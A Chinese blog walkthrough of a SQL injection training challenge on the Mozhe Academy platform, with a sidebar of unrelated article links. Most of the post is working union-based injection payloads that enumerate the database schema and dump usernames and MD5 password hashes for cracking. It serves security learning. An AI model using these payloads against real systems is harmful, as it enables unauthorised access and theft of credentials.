当前位置:网站首页>墨者学院SQL注入解题
墨者学院SQL注入解题
2020-11-08 09:40:00 【osc_7bgz0no1】
一·判断注入
输入id=1,正常返回。输入id=-1返回错误。由 此可知存在注入。
二·判断字段
URL id=-1 order by 1
URL id=-1 order by 2
URL id=-1 order by 3
URL id=-1 order by 4
URL id=-1 order by 5 此时报错,说明有四个字段
三·使用union查询注入点
输入union select 1,2,3,4
发现2,3为显注点
四·使用database()查库名
输入 union select 1,database(),3,4
查出库名为 mozhe_Discuz_StormGroup
五·查表名
输入
union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=‘mozhe_Discuz_StormGroup’
查询到StormGroup_member,notice
看见member,所以对第一个产生怀疑。所以首先查询第一个。
六·查询StormGroup_member中的存放的字段
输入
union select 1,group_concat(column_name)3,4 from information_schema.columns where table_name=‘StormGroup_member’
查询出id,name,password,status
七·查询密码和用户名
union select 1,group_concat(name,0x3a,password),3,4 from StormGroup_member
得到md5加密后的值。进行解密,得到密码。
如果密码不对,通过limit m,n来继续查询。
八·提交key
得到密码后进行登录可以看见key,复制,提交。
版权声明
本文为[osc_7bgz0no1]所创,转载请带上原文链接,感谢
https://my.oschina.net/u/4415254/blog/4707940
边栏推荐
- python 循环区分(while循环和for循环)
- IOS upload app store error: this action cannot be completed - 22421 solution
- swiper 窗口宽度变化,页面宽度高度变化 导致自动滑动 解决方案
- Python learning Day1 -- Basic Learning
- Blazor 准备好为企业服务了吗?
- nvm
- Distributed consensus mechanism
- 2020-11-07:已知一个正整数数组,两个数相加等于N并且一定存在,如何找到两个数相乘最小的两个数?
- M-end software product design considerations - Zhihu
- 麦格理银行借助DataStax Enterprise (DSE) 驱动数字化转型
猜你喜欢
M-end software product design considerations - Zhihu
Oschina plays on Sunday - before that, I always thought I was a
2020-11-07:已知一个正整数数组,两个数相加等于N并且一定存在,如何找到两个数相乘最小的两个数?
Unparseable date: 'mon Aug 15 11:24:39 CST 2016', time format conversion exception
1.深入Istio:Sidecar自动注入如何实现的?
Is there a big difference between i5 1135g7 and i51035g1? Which is better?
C++在C的基础上改进了哪些细节
FORTRAN77从文件中读入若干数据并用heron迭代公式开方
What? Your computer is too bad? You can handle these moves! (win10 optimization tutorial)
Game mathematical derivation AC code (high precision and low precision multiplication and division comparison) + 60 code (long long) + 20 point code (Full Permutation + deep search DFS)
随机推荐
C expression tree (1)
laravel8更新之速率限制改进
IOS learning note 2 [problems and solutions encountered during the installation and use of cocopods] [update 20160725]
计算机网络基本概念(五)局域网基本原理
来自不同行业领域的50多个对象检测数据集
OSChina 周日乱弹 —— 之前呢,我一直以为自己是个……
Seven features of Python 3.9
An error occurred while starting the kernel was successfully resolved
Which is more worth starting with the difference between vivos7e and vivos7
ASP.NET MVC下基于异常处理的完整解决方案
China Telecom announces 5g SA commercial scale in 2020
函数周期表丨筛选丨值丨SELECTEDVALUE - 知乎
Unparseable date: 'mon Aug 15 11:24:39 CST 2016', time format conversion exception
Rust:命令行参数与环境变量操作
Test requirements for MIC certification of Bluetooth 2.4G products in Japan
哔哩哔哩常用api
python 循环区分(while循环和for循环)
5G+AR出圈,中国移动咪咕成第33届中国电影金鸡奖全程战略合作伙伴
洞察——风格注意力网络(SANet)在任意风格迁移中的应用
iOS 学习笔记二【cocopods安装使用和安装过程中遇到的问题及解决办法】【20160725更新】